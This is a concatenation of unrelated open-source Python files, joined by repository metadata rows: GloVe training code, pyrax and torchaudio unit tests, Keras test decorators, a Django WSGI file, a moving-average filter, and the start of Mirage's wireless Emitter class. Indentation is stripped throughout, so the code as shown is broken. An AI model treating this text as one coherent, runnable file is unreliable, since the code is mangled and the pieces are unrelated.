# print "updated W"
# update b
for i in range(V):
denominator = fX[i,:].sum() + reg
# assert(denominator > 0)
numerator = fX[i,:].dot(logX[i,:] - W[i].dot(U.T) - c - mu)
# for j in range(V):
# numerator += fX[i,j]*(logX[i,j] - W[i].dot(U[j]) - c[j])
b[i] = numerator / denominator
# print "updated b"
# update U
for j in range(V):
# matrix = reg*np.eye(D) + np.sum((fX[i,j]*np.outer(W[i], W[i]) for i in range(V)), axis=0)
matrix = reg*np.eye(D) + (fX[:,j]*W.T).dot(W)
# assert(np.abs(matrix - matrix2).sum() < 1e-8)
vector = (fX[:,j]*(logX[:,j] - b - c[j] - mu)).dot(W)
# matrix = reg*np.eye(D)
# vector = 0
# for i in range(V):
# matrix += fX[i,j]*np.outer(W[i], W[i])
# vector += fX[i,j]*(logX[i,j] - b[i] - c[j])*W[i]
U[j] = np.linalg.solve(matrix, vector)
# print "updated U"
# update c
for j in range(V):
denominator = fX[:,j].sum() + reg
numerator = fX[:,j].dot(logX[:,j] - W.dot(U[j]) - b - mu)
# for i in range(V):
# numerator += fX[i,j]*(logX[i,j] - W[i].dot(U[j]) - b[i])
c[j] = numerator / denominator
# print "updated c"
self.W = W
self.U = U
plt.plot(costs)
plt.show()
def save(self, fn):
# function word_analogies expects a (V,D) matrx and a (D,V) matrix
arrays = [self.W, self.U.T]
np.savez(fn, *arrays)
def main(we_file, w2i_file, use_brown=True, n_files=100):
if use_brown:
cc_matrix = "cc_matrix_brown.npy"
else:
cc_matrix = "cc_matrix_%s.npy" % n_files
# hacky way of checking if we need to re-load the raw data or not
# remember, only the co-occurrence matrix is needed for training
if os.path.exists(cc_matrix):
with open(w2i_file) as f:
word2idx = json.load(f)
sentences = [] # dummy - we won't actually use it
else:
if use_brown:
keep_words = set([
'king', 'man', 'woman',
'france', 'paris', 'london', 'rome', 'italy', 'britain', 'england',
'french', 'english', 'japan', 'japanese', 'chinese', 'italian',
'australia', 'australian', 'december', 'november', 'june',
'january', 'february', 'march', 'april', 'may', 'july', 'august',
'september', 'october',
])
sentences, word2idx = get_sentences_with_word2idx_limit_vocab(n_vocab=5000, keep_words=keep_words)
else:
sentences, word2idx = get_wikipedia_data(n_files=n_files, n_vocab=2000)
with open(w2i_file, 'w') as f:
json.dump(word2idx, f)
V = len(word2idx)
model = Glove(100, V, 10)
# alternating least squares method
model.fit(sentences, cc_matrix=cc_matrix, epochs=20)
# gradient descent method
# model.fit(
# sentences,
# cc_matrix=cc_matrix,
# learning_rate=5e-4,
# reg=0.1,
# epochs=500,
# gd=True,
# )
model.save(we_file)
if __name__ == '__main__':
we = 'glove_model_50.npz'
w2i = 'glove_word2idx_50.json'
# we = 'glove_model_brown.npz'
# w2i = 'glove_word2idx_brown.json'
main(we, w2i, use_brown=False)
# load back embeddings
npz = np.load(we)
W1 = npz['arr_0']
W2 = npz['arr_1']
with open(w2i) as f:
word2idx = json.load(f)
idx2word = {i:w for w,i in word2idx.items()}
for concat in (True, False):
print("** concat:", concat)
if concat:
We = np.hstack([W1, W2.T])
else:
We = (W1 + W2.T) / 2
find_analogies('king', 'man', 'woman', We, word2idx, idx2word)
find_analogies('france', 'paris', 'london', We, word2idx, idx2word)
find_analogies('france', 'paris', 'rome', We, word2idx, idx2word)
find_analogies('paris', 'france', 'italy', We, word2idx, idx2word)
find_analogies('france', 'french', 'english', We, word2idx, idx2word)
find_analogies('japan', 'japanese', 'chinese', We, word2idx, idx2word)
find_analogies('japan', 'japanese', 'italian', We, word2idx, idx2word)
find_analogies('japan', 'japanese', 'australian', We, word2idx, idx2word)
find_analogies('december', 'november', 'june', We, word2idx, idx2word)
| 37.439252
| 117
| 0.473124
|
1524cd0617f8535fc5c9386207486ce54a8ef2f1
| 7,332
|
py
|
Python
|
tests/unit/test_cloud_networks.py
|
HQJaTu/pyrax
|
868f49527cd5e9161590eabd1144a6fcc02a7985
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_cloud_networks.py
|
HQJaTu/pyrax
|
868f49527cd5e9161590eabd1144a6fcc02a7985
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_cloud_networks.py
|
HQJaTu/pyrax
|
868f49527cd5e9161590eabd1144a6fcc02a7985
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import unittest
from mock import patch
from mock import MagicMock as Mock
import pyrax.cloudnetworks
from pyrax.cloudnetworks import CloudNetwork
from pyrax.cloudnetworks import CloudNetworkManager
from pyrax.cloudnetworks import CloudNetworkClient
from pyrax.cloudnetworks import _get_server_networks
import pyrax.exceptions as exc
import pyrax.utils as utils
from pyrax import fakes
example_cidr = "1.1.1.0/8"
example_uri = "http://example.com"
class CloudNetworksTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(CloudNetworksTest, self).__init__(*args, **kwargs)
def setUp(self):
self.client = fakes.FakeCloudNetworkClient()
def tearDown(self):
self.client = None
def test_get_types(self):
iso_network = fakes.FakeCloudNetwork()
svc_network = fakes.FakeCloudNetwork()
svc_network.id = pyrax.cloudnetworks.SERVICE_NET_ID
sav_get = pyrax.resource.BaseResource.get
pyrax.resource.BaseResource.get = Mock()
iso_network.get()
pyrax.resource.BaseResource.get.assert_called_once_with()
svc_network.get()
pyrax.resource.BaseResource.get.assert_called_once_with()
pyrax.resource.BaseResource.get = sav_get
def test_get_server_networks(self):
clt = self.client
iso_network = fakes.FakeCloudNetwork()
iso_id = iso_network.id
exp = [{"net-id": iso_id}, {"net-id": clt.PUBLIC_NET_ID},
{"net-id": clt.SERVICE_NET_ID}]
ret = _get_server_networks(iso_network, public=True, private=True)
self.assertEqual(ret, exp)
def test_get_server_networks_by_client(self):
clt = self.client
iso_network = fakes.FakeCloudNetwork()
iso_id = iso_network.id
ret = clt.get_server_networks(iso_network)
self.assertEqual(ret, [{"net-id": iso_id}])
ret = clt.get_server_networks(iso_network, private=True)
self.assertEqual(ret, [{"net-id": iso_id},
{"net-id": clt.SERVICE_NET_ID}])
def test_get_server_networks_by_network(self):
clt = self.client
iso_network = fakes.FakeCloudNetwork()
iso_id = iso_network.id
ret = iso_network.get_server_networks()
self.assertEqual(ret, [{"net-id": iso_id}])
ret = iso_network.get_server_networks(private=True)
self.assertEqual(ret, [{"net-id": iso_id},
{"net-id": clt.SERVICE_NET_ID}])
def test_create_manager(self):
clt = self.client
self.assertTrue(isinstance(clt._manager, CloudNetworkManager))
def test_create_body(self):
mgr = self.client._manager
nm = utils.random_unicode()
expected = {"network": {"label": nm, "cidr": example_cidr}}
returned = mgr._create_body(name=nm, cidr=example_cidr)
self.assertEqual(expected, returned)
def test_create(self):
clt = self.client
clt._manager.create = Mock(return_value=fakes.FakeCloudNetwork())
nm = utils.random_unicode()
new = clt.create(label=nm, cidr=example_cidr)
clt._manager.create.assert_called_once_with(label=nm, name=None,
cidr=example_cidr)
def test_create_fail_count(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "Request failed: too many networks."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.NetworkCountExceeded, clt.create, label=nm,
cidr=example_cidr)
def test_create_fail_cidr(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "CIDR does not contain enough addresses."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.NetworkCIDRInvalid, clt.create, label=nm,
cidr=example_cidr)
def test_create_fail_cidr_malformed(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "CIDR is malformed."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.NetworkCIDRMalformed, clt.create, label=nm,
cidr=example_cidr)
def test_create_fail_other(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "Something strange happened."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.BadRequest, clt.create, label=nm,
cidr=example_cidr)
def test_find_network_by_label(self):
clt = self.client
net1 = fakes.FakeCloudNetwork(name="First")
net2 = fakes.FakeCloudNetwork(name="Second")
net3 = fakes.FakeCloudNetwork(name="Third")
clt.list = Mock(return_value=[net1, net2, net3])
found = clt.find_network_by_label("Third")
self.assertEqual(found, net3)
def test_find_network_by_label_missing(self):
clt = self.client
net1 = fakes.FakeCloudNetwork(name="First")
net2 = fakes.FakeCloudNetwork(name="Second")
net3 = fakes.FakeCloudNetwork(name="Third")
clt.list = Mock(return_value=[net1, net2, net3])
self.assertRaises(exc.NetworkNotFound, clt.find_network_by_label,
"Fourth")
def test_find_network_by_label_multiple(self):
clt = self.client
net1 = fakes.FakeCloudNetwork(name="First")
net2 = fakes.FakeCloudNetwork(name="Third")
net3 = fakes.FakeCloudNetwork(name="Third")
clt.list = Mock(return_value=[net1, net2, net3])
self.assertRaises(exc.NetworkLabelNotUnique, clt.find_network_by_label,
"Third")
def test_network_name(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
self.assertEqual(net.label, nm)
self.assertEqual(net.name, nm)
net.name = "faker"
self.assertEqual(net.name, net.label)
def test_delete_network(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
net.manager = fakes.FakeManager()
net.manager.delete = Mock()
net.delete()
net.manager.delete.assert_called_once_with(net)
def test_delete_network_by_client(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
clt.method_delete = Mock(return_value=(None, None))
clt.delete(net)
clt.method_delete.assert_called_once_with("/os-networksv2/%s" % net.id)
def test_delete_network_fail(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
net.manager = fakes.FakeManager()
err = exc.Forbidden(403)
net.manager.delete = Mock(side_effect=err)
self.assertRaises(exc.NetworkInUse, net.delete)
def test_delete_network_by_client_fail(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
err = exc.Forbidden(403)
clt.method_delete = Mock(side_effect=err)
self.assertRaises(exc.NetworkInUse, clt.delete, net)
if __name__ == "__main__":
unittest.main()
| 35.941176
| 79
| 0.653983
|
49e8809a3ff7f5dc3033ca8d2c4d566b13a666f1
| 18,265
|
py
|
Python
|
keras/keras_parameterized.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | 1
|
2021-01-01T00:16:04.000Z
|
2021-01-01T00:16:04.000Z
|
keras/keras_parameterized.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | 1
|
2021-01-10T15:10:05.000Z
|
2021-01-25T09:19:15.000Z
|
keras/keras_parameterized.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | 1
|
2021-01-10T09:06:39.000Z
|
2021-01-10T09:06:39.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for unit-testing Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import collections.abc as collections_abc
import functools
import itertools
import unittest
from absl.testing import parameterized
import keras
from keras import testing_utils
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestCase(tf.test.TestCase, parameterized.TestCase):
def tearDown(self):
keras.backend.clear_session()
super(TestCase, self).tearDown()
def run_with_all_saved_model_formats(
test_or_class=None,
exclude_formats=None):
"""Execute the decorated test with all Keras saved model formats).
This decorator is intended to be applied either to individual test methods in
a `keras_parameterized.TestCase` class, or directly to a test class that
extends it. Doing so will cause the contents of the individual test
method (or all test methods in the class) to be executed multiple times - once
for each Keras saved model format.
The Keras saved model formats include:
1. HDF5: 'h5'
2. SavedModel: 'tf'
Note: if stacking this decorator with absl.testing's parameterized decorators,
those should be at the bottom of the stack.
Various methods in `testing_utils` to get file path for saved models will
auto-generate a string of the two saved model formats. This allows unittests
to confirm the equivalence between the two Keras saved model formats.
For example, consider the following unittest:
```python
class MyTests(testing_utils.KerasTestCase):
@testing_utils.run_with_all_saved_model_formats
def test_foo(self):
save_format = testing_utils.get_save_format()
saved_model_dir = '/tmp/saved_model/'
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
if __name__ == "__main__":
tf.test.main()
```
This test tries to save the model into the formats of 'hdf5', 'h5', 'keras',
'tensorflow', and 'tf'.
We can also annotate the whole class if we want this to apply to all tests in
the class:
```python
@testing_utils.run_with_all_saved_model_formats
class MyTests(testing_utils.KerasTestCase):
def test_foo(self):
save_format = testing_utils.get_save_format()
saved_model_dir = '/tmp/saved_model/'
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = tf.keras.models.load_model(saved_model_dir)
if __name__ == "__main__":
tf.test.main()
```
Args:
test_or_class: test method or class to be annotated. If None,
this method returns a decorator that can be applied to a test method or
test class. If it is not None this returns the decorator applied to the
test or class.
exclude_formats: A collection of Keras saved model formats to not run.
(May also be a single format not wrapped in a collection).
Defaults to None.
Returns:
Returns a decorator that will run the decorated test method multiple times:
once for each desired Keras saved model format.
Raises:
ImportError: If abseil parameterized is not installed or not included as
a target dependency.
"""
# Exclude h5 save format if H5py isn't available.
if h5py is None:
exclude_formats.append(['h5'])
saved_model_formats = ['h5', 'tf', 'tf_no_traces']
params = [('_%s' % saved_format, saved_format)
for saved_format in saved_model_formats
if saved_format not in tf.nest.flatten(exclude_formats)]
def single_method_decorator(f):
"""Decorator that constructs the test cases."""
# Use named_parameters so it can be individually run from the command line
@parameterized.named_parameters(*params)
@functools.wraps(f)
def decorated(self, saved_format, *args, **kwargs):
"""A run of a single test case w/ the specified model type."""
if saved_format == 'h5':
_test_h5_saved_model_format(f, self, *args, **kwargs)
elif saved_format == 'tf':
_test_tf_saved_model_format(f, self, *args, **kwargs)
elif saved_format == 'tf_no_traces':
_test_tf_saved_model_format_no_traces(f, self, *args, **kwargs)
else:
raise ValueError('Unknown model type: %s' % (saved_format,))
return decorated
return _test_or_class_decorator(test_or_class, single_method_decorator)
def _test_h5_saved_model_format(f, test_or_class, *args, **kwargs):
with testing_utils.saved_model_format_scope('h5'):
f(test_or_class, *args, **kwargs)
def _test_tf_saved_model_format(f, test_or_class, *args, **kwargs):
with testing_utils.saved_model_format_scope('tf'):
f(test_or_class, *args, **kwargs)
def _test_tf_saved_model_format_no_traces(f, test_or_class, *args, **kwargs):
with testing_utils.saved_model_format_scope('tf', save_traces=False):
f(test_or_class, *args, **kwargs)
def run_with_all_weight_formats(test_or_class=None, exclude_formats=None):
"""Runs all tests with the supported formats for saving weights."""
exclude_formats = exclude_formats or []
exclude_formats.append('tf_no_traces') # Only applies to saving models
return run_with_all_saved_model_formats(test_or_class, exclude_formats)
# TODO(kaftan): Possibly enable 'subclass_custom_build' when tests begin to pass
# it. Or perhaps make 'subclass' always use a custom build method.
def run_with_all_model_types(
test_or_class=None,
exclude_models=None):
"""Execute the decorated test with all Keras model types.
This decorator is intended to be applied either to individual test methods in
a `keras_parameterized.TestCase` class, or directly to a test class that
extends it. Doing so will cause the contents of the individual test
method (or all test methods in the class) to be executed multiple times - once
for each Keras model type.
The Keras model types are: ['functional', 'subclass', 'sequential']
Note: if stacking this decorator with absl.testing's parameterized decorators,
those should be at the bottom of the stack.
Various methods in `testing_utils` to get models will auto-generate a model
of the currently active Keras model type. This allows unittests to confirm
the equivalence between different Keras models.
For example, consider the following unittest:
```python
class MyTests(testing_utils.KerasTestCase):
@testing_utils.run_with_all_model_types(
exclude_models = ['sequential'])
def test_foo(self):
model = testing_utils.get_small_mlp(1, 4, input_dim=3)
optimizer = RMSPropOptimizer(learning_rate=0.001)
loss = 'mse'
metrics = ['mae']
model.compile(optimizer, loss, metrics=metrics)
inputs = np.zeros((10, 3))
targets = np.zeros((10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((inputs, targets))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
model.fit(dataset, epochs=1, steps_per_epoch=2, verbose=1)
if __name__ == "__main__":
tf.test.main()
```
This test tries building a small mlp as both a functional model and as a
subclass model.
We can also annotate the whole class if we want this to apply to all tests in
the class:
```python
@testing_utils.run_with_all_model_types(exclude_models = ['sequential'])
class MyTests(testing_utils.KerasTestCase):
def test_foo(self):
model = testing_utils.get_small_mlp(1, 4, input_dim=3)
optimizer = RMSPropOptimizer(learning_rate=0.001)
loss = 'mse'
metrics = ['mae']
model.compile(optimizer, loss, metrics=metrics)
inputs = np.zeros((10, 3))
targets = np.zeros((10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((inputs, targets))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
model.fit(dataset, epochs=1, steps_per_epoch=2, verbose=1)
if __name__ == "__main__":
tf.test.main()
```
Args:
test_or_class: test method or class to be annotated. If None,
this method returns a decorator that can be applied to a test method or
test class. If it is not None this returns the decorator applied to the
test or class.
exclude_models: A collection of Keras model types to not run.
(May also be a single model type not wrapped in a collection).
Defaults to None.
Returns:
Returns a decorator that will run the decorated test method multiple times:
once for each desired Keras model type.
Raises:
ImportError: If abseil parameterized is not installed or not included as
a target dependency.
"""
model_types = ['functional', 'subclass', 'sequential']
params = [('_%s' % model, model) for model in model_types
if model not in tf.nest.flatten(exclude_models)]
def single_method_decorator(f):
"""Decorator that constructs the test cases."""
# Use named_parameters so it can be individually run from the command line
@parameterized.named_parameters(*params)
@functools.wraps(f)
def decorated(self, model_type, *args, **kwargs):
"""A run of a single test case w/ the specified model type."""
if model_type == 'functional':
_test_functional_model_type(f, self, *args, **kwargs)
elif model_type == 'subclass':
_test_subclass_model_type(f, self, *args, **kwargs)
elif model_type == 'sequential':
_test_sequential_model_type(f, self, *args, **kwargs)
else:
raise ValueError('Unknown model type: %s' % (model_type,))
return decorated
return _test_or_class_decorator(test_or_class, single_method_decorator)
def _test_functional_model_type(f, test_or_class, *args, **kwargs):
with testing_utils.model_type_scope('functional'):
f(test_or_class, *args, **kwargs)
def _test_subclass_model_type(f, test_or_class, *args, **kwargs):
with testing_utils.model_type_scope('subclass'):
f(test_or_class, *args, **kwargs)
def _test_sequential_model_type(f, test_or_class, *args, **kwargs):
with testing_utils.model_type_scope('sequential'):
f(test_or_class, *args, **kwargs)
def run_all_keras_modes(test_or_class=None,
config=None,
always_skip_v1=False,
always_skip_eager=False,
**kwargs):
"""Execute the decorated test with all keras execution modes.
This decorator is intended to be applied either to individual test methods in
a `keras_parameterized.TestCase` class, or directly to a test class that
extends it. Doing so will cause the contents of the individual test
method (or all test methods in the class) to be executed multiple times -
once executing in legacy graph mode, once running eagerly and with
`should_run_eagerly` returning True, and once running eagerly with
`should_run_eagerly` returning False.
If Tensorflow v2 behavior is enabled, legacy graph mode will be skipped, and
the test will only run twice.
Note: if stacking this decorator with absl.testing's parameterized decorators,
those should be at the bottom of the stack.
For example, consider the following unittest:
```python
class MyTests(testing_utils.KerasTestCase):
@testing_utils.run_all_keras_modes
def test_foo(self):
model = testing_utils.get_small_functional_mlp(1, 4, input_dim=3)
optimizer = RMSPropOptimizer(learning_rate=0.001)
loss = 'mse'
metrics = ['mae']
model.compile(
optimizer, loss, metrics=metrics,
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.zeros((10, 3))
targets = np.zeros((10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((inputs, targets))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
model.fit(dataset, epochs=1, steps_per_epoch=2, verbose=1)
if __name__ == "__main__":
tf.test.main()
```
This test will try compiling & fitting the small functional mlp using all
three Keras execution modes.
Args:
test_or_class: test method or class to be annotated. If None,
this method returns a decorator that can be applied to a test method or
test class. If it is not None this returns the decorator applied to the
test or class.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
always_skip_v1: If True, does not try running the legacy graph mode even
when Tensorflow v2 behavior is not enabled.
always_skip_eager: If True, does not execute the decorated test
with eager execution modes.
**kwargs: Additional kwargs for configuring tests for
in-progress Keras behaviors/ refactorings that we haven't fully
rolled out yet
Returns:
Returns a decorator that will run the decorated test method multiple times.
Raises:
ImportError: If abseil parameterized is not installed or not included as
a target dependency.
"""
skip_keras_tensors = kwargs.pop('skip_keras_tensors', False)
if kwargs:
raise ValueError('Unrecognized keyword args: {}'.format(kwargs))
params = [('_v2_function', 'v2_function')]
if not skip_keras_tensors:
params.append(('_v2_function_use_keras_tensors',
'v2_function_use_keras_tensors'))
if not always_skip_eager:
params.append(('_v2_eager', 'v2_eager'))
if not (always_skip_v1 or tf.__internal__.tf2.enabled()):
params.append(('_v1_session', 'v1_session'))
def single_method_decorator(f):
"""Decorator that constructs the test cases."""
# Use named_parameters so it can be individually run from the command line
@parameterized.named_parameters(*params)
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
"""A run of a single test case w/ specified run mode."""
if run_mode == 'v1_session':
_v1_session_test(f, self, config, *args, **kwargs)
elif run_mode == 'v2_eager':
_v2_eager_test(f, self, *args, **kwargs)
elif run_mode == 'v2_function':
_v2_function_test(f, self, *args, **kwargs)
elif run_mode == 'v2_function_use_keras_tensors':
_v2_function_and_kerastensors_test(f, self, *args, **kwargs)
else:
return ValueError('Unknown run mode %s' % run_mode)
return decorated
return _test_or_class_decorator(test_or_class, single_method_decorator)
def _v1_session_test(f, test_or_class, config, *args, **kwargs):
with tf.compat.v1.get_default_graph().as_default():
with testing_utils.run_eagerly_scope(False):
with test_or_class.test_session(use_gpu=True, config=config):
f(test_or_class, *args, **kwargs)
def _v2_eager_test(f, test_or_class, *args, **kwargs):
with tf.__internal__.eager_context.eager_mode():
with testing_utils.run_eagerly_scope(True):
f(test_or_class, *args, **kwargs)
def _v2_function_test(f, test_or_class, *args, **kwargs):
with tf.__internal__.eager_context.eager_mode():
with testing_utils.run_eagerly_scope(False):
f(test_or_class, *args, **kwargs)
def _v2_function_and_kerastensors_test(f, test_or_class, *args, **kwargs):
with tf.__internal__.eager_context.eager_mode():
with testing_utils.run_eagerly_scope(False):
with testing_utils.use_keras_tensors_scope(True):
f(test_or_class, *args, **kwargs)
def _test_or_class_decorator(test_or_class, single_method_decorator):
"""Decorate a test or class with a decorator intended for one method.
If the test_or_class is a class:
This will apply the decorator to all test methods in the class.
If the test_or_class is an iterable of already-parameterized test cases:
This will apply the decorator to all the cases, and then flatten the
resulting cross-product of test cases. This allows stacking the Keras
parameterized decorators w/ each other, and to apply them to test methods
that have already been marked with an absl parameterized decorator.
Otherwise, treat the obj as a single method and apply the decorator directly.
Args:
test_or_class: A test method (that may have already been decorated with a
parameterized decorator, or a test class that extends
keras_parameterized.TestCase
single_method_decorator:
A parameterized decorator intended for a single test method.
Returns:
The decorated result.
"""
def _decorate_test_or_class(obj):
if isinstance(obj, collections_abc.Iterable):
return itertools.chain.from_iterable(
single_method_decorator(method) for method in obj)
if isinstance(obj, type):
cls = obj
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix):
setattr(cls, name, single_method_decorator(value))
cls = type(cls).__new__(type(cls), cls.__name__, cls.__bases__,
cls.__dict__.copy())
return cls
return single_method_decorator(obj)
if test_or_class is not None:
return _decorate_test_or_class(test_or_class)
return _decorate_test_or_class
| 37.048682
| 80
| 0.717054
|
942ea4433d99790198dab89da80356c6c82d6944
| 396
|
py
|
Python
|
DjangoApp/wsgi.py
|
johnnynode/Django-demo
|
421f4d23d2773a1338a5163605a2f29202c91396
|
[
"MIT"
] | 2
|
2018-08-18T15:14:45.000Z
|
2019-10-16T16:14:13.000Z
|
DjangoApp/wsgi.py
|
johnnynode/Django-demo
|
421f4d23d2773a1338a5163605a2f29202c91396
|
[
"MIT"
] | null | null | null |
DjangoApp/wsgi.py
|
johnnynode/Django-demo
|
421f4d23d2773a1338a5163605a2f29202c91396
|
[
"MIT"
] | 6
|
2018-05-05T18:13:05.000Z
|
2021-05-20T11:32:48.000Z
|
"""
WSGI config for DjangoApp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "DjangoApp.settings")
application = get_wsgi_application()
| 23.294118
| 78
| 0.787879
|
92b1f01c5dd17bdd04cec478f48a6265a0757fc4
| 561
|
py
|
Python
|
dsptools/filters/cumulative_moving_average.py
|
jamlamberti/dsp-tools
|
490bc50a497a3a7be85d48b29a8bb3d74ca7f5e8
|
[
"MIT"
] | null | null | null |
dsptools/filters/cumulative_moving_average.py
|
jamlamberti/dsp-tools
|
490bc50a497a3a7be85d48b29a8bb3d74ca7f5e8
|
[
"MIT"
] | 2
|
2019-10-11T03:54:35.000Z
|
2019-10-30T00:27:45.000Z
|
dsptools/filters/cumulative_moving_average.py
|
jamlamberti/dsp-tools
|
490bc50a497a3a7be85d48b29a8bb3d74ca7f5e8
|
[
"MIT"
] | null | null | null |
from ..signal_generators.base_generator import BaseGenerator
class CumulativeMovingAverage(BaseGenerator):
def __init__(self, generator):
super(CumulativeMovingAverage, self).__init__()
self._generator = generator
self._cntr = 0
self._cma = 0.
def next_value(self):
self._cntr += 1
self._cma += float(self._generator.next_value() - self._cma)
self._cma /= self._cntr
return self._cma
def rewind(self):
self._cntr = 0
self._cma = 0.
self._generator.rewind()
| 26.714286
| 68
| 0.634581
|
bda9b2264d8cff2e3b2566724a3027f99b16b475
| 1,726
|
py
|
Python
|
test/torchaudio_unittest/prototype/conformer_test_impl.py
|
popcornell/audio
|
7b6b2d000023e2aa3365b769866c5f375e0d5fda
|
[
"BSD-2-Clause"
] | null | null | null |
test/torchaudio_unittest/prototype/conformer_test_impl.py
|
popcornell/audio
|
7b6b2d000023e2aa3365b769866c5f375e0d5fda
|
[
"BSD-2-Clause"
] | 1
|
2021-09-07T15:42:33.000Z
|
2021-09-14T21:39:04.000Z
|
test/torchaudio_unittest/prototype/conformer_test_impl.py
|
popcornell/audio
|
7b6b2d000023e2aa3365b769866c5f375e0d5fda
|
[
"BSD-2-Clause"
] | null | null | null |
import torch
from torchaudio.prototype.models import Conformer
from torchaudio_unittest.common_utils import TestBaseMixin, torch_script
class ConformerTestImpl(TestBaseMixin):
def _gen_model(self):
conformer = (
Conformer(
num_layers=4,
input_dim=80,
conv_channels=64,
conformer_layer_input_dim=256,
conv_kernel_sizes=[5, 5],
max_source_positions=6000,
ffn_dim=128,
num_attention_heads=4,
depthwise_conv_kernel_size=31,
dropout=0.1,
)
.to(device=self.device, dtype=self.dtype)
.eval()
)
return conformer
def _gen_inputs(self, input_dim, batch_size, num_frames):
lengths = torch.randint(1, num_frames, (batch_size,)).to(device=self.device, dtype=self.dtype)
input = torch.rand(batch_size, int(lengths.max()), input_dim).to(device=self.device, dtype=self.dtype)
return input, lengths
def setUp(self):
super().setUp()
torch.random.manual_seed(31)
def test_torchscript_consistency_forward(self):
r"""Verify that scripting Conformer does not change the behavior of method `forward`."""
input_dim = 80
batch_size = 10
num_frames = 400
conformer = self._gen_model()
input, lengths = self._gen_inputs(input_dim, batch_size, num_frames)
scripted = torch_script(conformer)
ref_out, ref_len = conformer(input, lengths)
scripted_out, scripted_len = scripted(input, lengths)
self.assertEqual(ref_out, scripted_out)
self.assertEqual(ref_len, scripted_len)
| 34.52
| 110
| 0.625724
|
813fa2010aabffb37d93f6ebd97ecc00d0c312b3
| 12,299
|
py
|
Python
|
mirage/libs/wireless.py
|
Cabalist/mirage
|
22553d22da4e87ffb99da8d19f8b552986df0965
|
[
"MIT"
] | null | null | null |
mirage/libs/wireless.py
|
Cabalist/mirage
|
22553d22da4e87ffb99da8d19f8b552986df0965
|
[
"MIT"
] | null | null | null |
mirage/libs/wireless.py
|
Cabalist/mirage
|
22553d22da4e87ffb99da8d19f8b552986df0965
|
[
"MIT"
] | null | null | null |
import time
from queue import Empty, Queue
from scapy.packet import Packet
import mirage.libs.io as io
from mirage.libs.wireless_utils.callbacks import Callback
from mirage.libs.wireless_utils.device import Device
from mirage.libs.wireless_utils.packetQueue import PacketQueue
from mirage.libs.wireless_utils.packets import WaitPacket
class Emitter(PacketQueue):
'''
This class allows an user to communicate with a device in order to send data. Indeed, Mirage provides no direct access to the device component from the modules : the hardware components are manipulated thanks to the Emitter class and the Receiver class. Emitters' classes for a given technology inherits from this class.
The packet are manipulated as an abstract representation in Emitters and Receivers (``mirage.libs.wireless_utils.packets.Packet``) and as a raw representation in Device (e.g. bytes array or scapy frame). That's why an Emitter must implement the following method :
* convert(self,packet) : this method converts a Mirage Packet into its raw representation
The constructor of an Emitter needs three parameters :
* `interface` : indicating the interface to use to instantiate the device, generally it will be provided by the user
* `packetType` : indicating the child class of Packet for the technology implemented by the Emitter
* `deviceType` : indicating the child class of Device to instanciate
A `_task` method is implemented by default. It gets a Mirage Packet from the queue, calls the convert method on it and calls the send method of a Device on the result. If you want to customize this behaviour, you can overload this method.
'''
def __init__(self,interface,packetType=Packet, deviceType=Device):
self.interface = interface
self.packetType = packetType
self.deviceType = deviceType
self.device = self.deviceType.get(self.interface)
